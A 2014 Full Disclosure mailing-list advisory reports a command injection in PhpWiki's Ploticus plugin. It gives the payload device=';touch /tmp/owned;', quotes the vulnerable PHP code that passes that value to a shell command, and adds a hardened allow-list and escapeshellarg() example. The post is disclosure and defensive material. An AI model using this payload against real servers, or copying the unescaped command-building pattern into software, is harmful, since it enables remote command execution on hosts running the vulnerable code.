Date: Wed, 27 Aug 2014 23:23:45 +0100
From: "Benjamin Harris" <>
Subject: [FD] PHP-Wiki Command Injection

Hi All

OSS-Security, can I get a CVE for this please?


I tried to report this a month ago, but got no response from the 
developers. This is an old vulnerability I found while dusting off 
some old hard drives.


PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site 
where anyone can edit the pages through an HTML form. Multiple 
storage backends, dynamic hyperlinking, themeable, scriptable by 
plugins, full authentication, ACLs.


Straight command injection in the Ploticus module. Attached is a 
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned

Vulnerable code, with the system execute at the bottom; the 
controllable param is $args:

            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . " $tempfile.plo $args", $tempfile.".$gif");

['device'] is listed as an option set by the user when using the Ploticus plugin.

Example usage:

 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...


    // Excerpt of the Ploticus plugin's getImage() as posted; several lines
    // and closing braces are cut short in the report.
    function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        $source =& $this->source;
        if (!empty($source)) {
            // Only the ploticus script body is screened for shell commands;
            // the plugin arguments are not.
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed in Ploticus");
                return false;
            if (is_array($argarray['data'])) { // support <!plugin-list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                        $src .= ("\t" . '"' . $data . '" ' . $i++ . 
                $src .= $source;
                $source = $src;
            $tempfile = $this->tempnam('Ploticus','plo');
            // User-controlled: the device= value from the wiki markup,
            // interpolated into the argument string unmodified.
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $";
                    $this->_mapfile = "$";
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default 
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
                    // -prefab is concatenated the same way as device
                    $args .= (" -prefab " . $argarray['-prefab']);
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                // Sink: $args becomes part of a shell command line.
                $code = $this->execute(PLOTICUS_EXE . " $tempfile.plo $args", $tempfile.".$gif");

Many thanks,
View attachment "" of type "text/x-python" (1855 bytes)

Sent through the Full Disclosure mailing list
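The argument construction above, reduced to a vulnerable and a hardened form, as an added example that is not part of the original post or of PhpWiki's code. The function names, the PLOTICUS_EXE path, the temp-file name and the list of accepted output devices are assumptions for illustration. The vulnerable function reproduces the shape of the reported code: the device value is interpolated into a string that later reaches /bin/sh, so ";touch /tmp/owned;" is parsed as three commands. The hardened function checks the device against an allow-list before it is used and quotes every argument with escapeshellarg(), so metacharacters can never reach the shell even if the allow-list is later widened. The -prefab value visible at the end of the excerpt is concatenated the same way and needs the same treatment.

```php
<?php
// Added example, not PhpWiki code. Names and paths below are assumptions.

const PLOTICUS_EXE = '/usr/bin/ploticus';   // assumed install path

// Mirrors the reported code: $device goes into the command line untouched.
// With $device = ';touch /tmp/owned;' the shell sees
//   ploticus /tmp/X.plo - ; touch /tmp/owned ; -o /tmp/X. ; touch /tmp/owned ;
function buildCommandVulnerable(string $device, string $tempfile): string
{
    $args = "-$device -o $tempfile.$device";
    return PLOTICUS_EXE . " $tempfile.plo $args";
}

// Hardened variant: only accept known output devices, then quote each
// argument so the shell never interprets user input.
function buildCommandSafe(string $device, string $tempfile): string
{
    // Allow-list of ploticus output devices (ploticus -<device>); assumed set.
    static $allowed = ['png', 'gif', 'jpeg', 'svg', 'eps', 'ps'];
    if (!in_array($device, $allowed, true)) {
        throw new InvalidArgumentException("unsupported device: $device");
    }
    $parts = [
        PLOTICUS_EXE,
        "$tempfile.plo",
        "-$device",
        '-o',
        "$tempfile.$device",
    ];
    // escapeshellarg() wraps each part in single quotes and escapes any
    // embedded quote, so ';' '|' '$(...)' etc. stay literal.
    return implode(' ', array_map('escapeshellarg', $parts));
}

// Demonstration with the payload from the report. Nothing is executed;
// the command strings are only printed so the difference is visible.
$payload = ';touch /tmp/owned;';
$tmp     = '/tmp/PloticusXYZ';   // constructed temp-file name

echo "vulnerable: " . buildCommandVulnerable($payload, $tmp) . "\n";

try {
    echo "hardened:   " . buildCommandSafe($payload, $tmp) . "\n";
} catch (InvalidArgumentException $e) {
    echo "hardened:   rejected (" . $e->getMessage() . ")\n";
}

echo "hardened:   " . buildCommandSafe('png', $tmp) . "\n";
```

Run it with `php example.php`. The first line shows the unquoted command that the shell would split on `;`; the second shows the payload being rejected before any string is built; the third shows a legitimate device producing a fully quoted command line. Quoting alone, without the allow-list, would still pass `-';touch /tmp/owned;'` to ploticus as a single bogus option, which is harmless but noisy, so the check on the device name is what keeps the error path clean.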